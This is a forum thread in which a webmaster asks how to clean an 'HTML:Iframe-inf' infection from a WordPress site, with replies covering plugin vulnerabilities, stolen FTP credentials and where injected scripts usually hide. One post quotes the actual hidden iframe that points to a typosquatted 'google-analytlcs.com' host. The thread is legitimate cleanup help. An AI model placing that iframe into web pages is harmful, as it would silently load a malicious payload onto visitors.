SitePoint Sponsor

User Tag List

Results 1 to 5 of 5
  1. #1
    SitePoint Addict iwonder's Avatar
    Join Date
    Feb 2005
    Posts
    266
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Unhappy HTML:Iframe-inf Malware in my wordpress website, How do I get rid of it ?

    I just got a notification from Google that my site is infected with malicious software and it shall be tagged with a hrmful message on google.com search.

    http://www.google.com/search?q=sr-ultimate.com

    I looked into my site, and avast antivirus also showed me a virus alert of "
    HTML:Iframe-inf " malware. I tried changing the wordpress theme of the site but that is not helping.

    Can anyone please let me know how to go about it ?

    http://www.google.com/search?q=sr-ultimate.com

  2. #2
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,191
    Mentioned
    191 Post(s)
    Tagged
    2 Thread(s)
    I notice one of the results shows
    Warning: fopen(counterst.dat) [function.fopen]: failed to open stream: Permission denied in /home/sr/public_html/siterank.php on line 444 ...
    Have you gone to http://www.google.com/support/webmas...?answer=163633 ??

  3. #3
    SitePoint Addict iwonder's Avatar
    Join Date
    Feb 2005
    Posts
    266
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    The counters.dat error is legitimate as I had removed the counter script but left the code in the php file.

    I searched for Database and one of my post had a iframe which i removed. I have asked the sys admin to do a search of all the files .

    The iframe on the post was

    <iframe src="http://google-analytlcs.com/l/index.php" width=
    "1" height="1" frameborder="0"> </iframe>
    Note that the google-analytlcs is a fake with with "i" replaced with "l".

    But I still don't know the security hole, I have the latest wordpress version, all of the files or folders have write permission only for server and user.

  4. #4
    Programming Team silver trophybronze trophy
    Mittineague's Avatar
    Join Date
    Jul 2005
    Location
    West Springfield, Massachusetts
    Posts
    17,191
    Mentioned
    191 Post(s)
    Tagged
    2 Thread(s)
    Well, it's certainly best practice to have the version up to date. Kudos for that.
    It could be the theme, but I suspect it's more likely to be a plugin vulnerability.
    Do you have lots of them, can you list them here?

  5. #5
    SitePoint Enthusiast
    Join Date
    May 2010
    Posts
    25
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quite often we find that websites have been infected by stolen FTP login credentials (username and password).

    These credentials are stolen by a virus on a PC that has FTP access to the infected website.

    The virus in many ways.

    First, if you're using a PC with one of the free FTP programs like FileZilla, then you should know that many of those programs store the saved login credentials in a plain text file on the PC.

    If you're on Windows XP and using the latest FileZilla, look in:

    C:\Document and Settings\(user)\Application Data\FileZilla\sitemanager.xml, where (user) is the currently logged in user to the PC. This is usually administrator.

    The PC gets infected by a virus, probably from the user visiting an infected website, and the virus looks for these files, reads them and sends the contents to a serverwhich then uses valid login and password to infect the website.

    The hackers will usually put backdoors on the website as well so they can re-infect the website after the owner has changed the FTP password (step #1 by the way).

    These backdoors can be .php, perl or other files.

    The second way the virus works is by sniffing the outgoing FTP traffic. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to "see" and steal the login credentials this way as well.

    I have a youtube video that shows how easy it is to sniff FTP traffic:

    http://www.youtube.com/watch?v=oYI1kssrrbc

    The only way to avoid that method is to see if your hosting provider supports SFTP or FTPS. Those protocols are encrypted so it's more difficult to sniff.

    So, first change all FTP passwords. I recommend creating a different FTP account for each user, that includes developers, webmasters, etc.

    Then make sure that FTP logging is activated. Many hosting providers have this off by default.

    With these two steps, if your site does get infected again, you can look in the logs and see who's FTP account was used to infect the website. That's the person with the virus.

    Now, where to find the infectious code (malscripts).

    We generally find it in these locations:

    1. Before the opening html tag (<html>)
    2. Sometimes right after the opening html tag
    3. Immediately after the closing head tag
    4. Between the closing head tag and the opening body tag
    5. Immediately after the opening body tag (you may have to scroll to the right to see it)
    6. Right before the closing body tag
    7. Between the closing body tag and the closing html tag
    8. After the closing html tag. (again, you may have to scroll to see it)

    In .js files it's usually in the last lines of the file so it doesn't negatively affect the good code.

    Clean the files or if you have a known, good backup, just restore your site. However, that won't get rid of the backdoors. Those are too many to list and there are a multitude of variations as well. If you have a file that you suspect, if you provide it to me, I will inspect it and let you know.

    I hope this helps. This is my experience from cleaning over 20,000 websites during the past 3 years.


Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •